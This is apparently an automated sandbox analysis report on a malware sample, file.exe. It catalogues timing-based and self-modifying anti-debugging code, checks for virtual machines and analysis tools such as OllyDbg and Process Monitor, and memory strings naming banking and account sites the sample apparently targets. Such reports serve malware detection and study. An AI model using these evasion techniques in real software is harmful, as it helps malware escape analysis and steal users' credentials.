Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0159 second address: 4DD019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d pushad 0x0000000e jmp 00007F2B4D4AC9F5h 0x00000013 mov ch, E8h 0x00000015 popad 0x00000016 mov edi, 00000000h 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2B4D4AC9EFh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD019B second address: 4DD01B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4CC6E2B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD01B3 second address: 4DD01CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bl, cl 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD01CA second address: 4DD01E8 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ah, dl 0x00000008 popad 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2B4CC6E2B1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD01E8 second address: 4DD0239 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2B4D4AC9F7h 0x00000008 pushfd 0x00000009 jmp 00007F2B4D4AC9F8h 0x0000000e sub ah, FFFFFF98h 0x00000011 jmp 00007F2B4D4AC9EBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007F2B4D4ACBC3h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0239 second address: 4DD0254 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD036A second address: 4DD0370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0370 second address: 4DD0374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0374 second address: 4DD03B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007F2BBE9AAAEDh 0x00000011 pushad 0x00000012 mov di, ax 0x00000015 mov edx, ecx 0x00000017 popad 0x00000018 js 00007F2B4D4ACA5Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F2B4D4AC9F9h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD03B3 second address: 4DD03ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F2B4CC6E2AEh 0x00000011 jne 00007F2BBE16C368h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F2B4CC6E2AAh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD03ED second address: 4DD03F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD03F3 second address: 4DD0404 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4CC6E2ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0404 second address: 4DD0408 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0408 second address: 4DD045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov bh, 3Fh 0x0000000e pushfd 0x0000000f jmp 00007F2B4CC6E2B4h 0x00000014 adc ah, FFFFFFA8h 0x00000017 jmp 00007F2B4CC6E2ABh 0x0000001c popfd 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-2Ch] 0x00000021 jmp 00007F2B4CC6E2B6h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD045B second address: 4DD045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD045F second address: 4DD0465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0465 second address: 4DD0494 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2B4D4AC9F1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2B4D4AC9F3h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0494 second address: 4DD0498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0498 second address: 4DD049E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD049E second address: 4DD04A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD04A4 second address: 4DD04D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F2B4D4AC9F0h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD04D0 second address: 4DD04D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD04D4 second address: 4DD04D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD04D8 second address: 4DD04DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD04DE second address: 4DD0546 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dx, 9D34h 0x0000000f pushfd 0x00000010 jmp 00007F2B4D4AC9EDh 0x00000015 or si, A4F6h 0x0000001a jmp 00007F2B4D4AC9F1h 0x0000001f popfd 0x00000020 popad 0x00000021 nop 0x00000022 pushad 0x00000023 mov ax, 8983h 0x00000027 movzx esi, di 0x0000002a popad 0x0000002b push ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F2B4D4AC9F7h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0D45 second address: 4DC0D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0D4B second address: 4DC0D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 jmp 00007F2B4D4AC9F0h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0D6B second address: 4DC0D71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0A46 second address: 4DD0A92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 05h 0x0000000d pushfd 0x0000000e jmp 00007F2B4D4AC9F8h 0x00000013 jmp 00007F2B4D4AC9F5h 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0A92 second address: 4DD0A98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0A98 second address: 4DD0ABE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2B4D4AC9EAh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0ABE second address: 4DD0AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0B5D second address: 4DD0B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0B63 second address: 4DD0B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DD0C2F second address: 4DD0C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0BF1 second address: 4DE0C77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 mov ecx, 5462A42Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F2B4CC6E2B1h 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 call 00007F2B4CC6E2ACh 0x0000001b pushfd 0x0000001c jmp 00007F2B4CC6E2B2h 0x00000021 xor esi, 7C778618h 0x00000027 jmp 00007F2B4CC6E2ABh 0x0000002c popfd 0x0000002d pop esi 0x0000002e call 00007F2B4CC6E2B9h 0x00000033 pushad 0x00000034 popad 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F2B4CC6E2AFh 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0C77 second address: 4DE0C94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0C94 second address: 4DE0C9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0C9A second address: 4DE0CB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f call 00007F2B4D4AC9EAh 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0CB5 second address: 4DE0D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F2B4CC6E2B0h 0x00000011 mov esi, dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 movzx ecx, dx 0x00000018 pushfd 0x00000019 jmp 00007F2B4CC6E2B3h 0x0000001e jmp 00007F2B4CC6E2B3h 0x00000023 popfd 0x00000024 popad 0x00000025 test esi, esi 0x00000027 pushad 0x00000028 mov ax, bx 0x0000002b popad 0x0000002c je 00007F2BBE14B94Ah 0x00000032 jmp 00007F2B4CC6E2ADh 0x00000037 cmp dword ptr [7632459Ch], 05h 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F2B4CC6E2B3h 0x00000047 sbb esi, 1C8537CEh 0x0000004d jmp 00007F2B4CC6E2B9h 0x00000052 popfd 0x00000053 jmp 00007F2B4CC6E2B0h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0D75 second address: 4DE0D93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F2BBE9A20F9h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov edx, 3ABFB2B6h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0E20 second address: 4DE0E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0E24 second address: 4DE0E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0E28 second address: 4DE0E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0E77 second address: 4DE0E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0E7B second address: 4DE0E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0E81 second address: 4DE0E9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0E9E second address: 4DE0EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0EA2 second address: 4DE0EBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2B4D4AC9EFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0EBE second address: 4DE0EDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0EDB second address: 4DE0EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2B4D4AC9F2h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0EF6 second address: 4DE0EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0EFC second address: 4DE0F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CD8A7F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CFF66A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: CE8821 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: D62D54 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B38A35 rdtsc

0_2_00B38A35

Source: C:\Users\user\Desktop\file.exe TID: 8428	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 8400	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 8544	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 8404	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 8544	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.1759057360.0000000000CB8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.1573531425.0000000005828000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, 00000000.00000003.1757983380.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1757851048.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758790441.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676138982.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1638552100.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1697028773.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1758627826.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.1759057360.0000000000CB8000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.1573605511.0000000005780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B38A35 rdtsc

0_2_00B38A35

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00B19660 LdrInitializeThunk,

0_2_00B19660

Source: file.exe, file.exe, 00000000.00000002.1759057360.0000000000CB8000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: rK2Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

